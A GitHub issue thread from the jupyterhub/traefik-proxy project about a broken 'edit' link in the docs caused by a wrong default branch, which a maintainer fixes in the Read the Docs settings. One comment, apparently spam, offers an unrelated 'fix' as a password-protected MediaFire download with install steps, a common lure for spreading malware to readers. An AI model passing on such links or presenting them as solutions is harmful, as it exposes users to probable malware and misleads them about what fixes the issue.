### ISSUE TITLE
Edit link in docs not working because of wrong branch

### ISSUE THREAD

**Issue by buti1021** [jupyterhub/traefik-proxy#255]
### How to reproduce

1. Go to https://jupyterhub-traefik-proxy.readthedocs.io/en/latest/https.html
2. Scroll down
3. Click on the version in the bottom left corner
4. Click on edit

#### Expected behaviour

Getting linked to the correct URL in Github to edit the docs

#### Actual behaviour

Link is broken, because of wrong branch name (uses "master" but should be "main")

#### Solution:

Change the branch used somehow

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by minrk** [comment]
Thanks for reporting! I believe I've fixed this by changing the default branch in the RTD admin settings. Can you confirm the link works now?

**Comment by buti1021** [comment]
Works like a charm! Thank you!
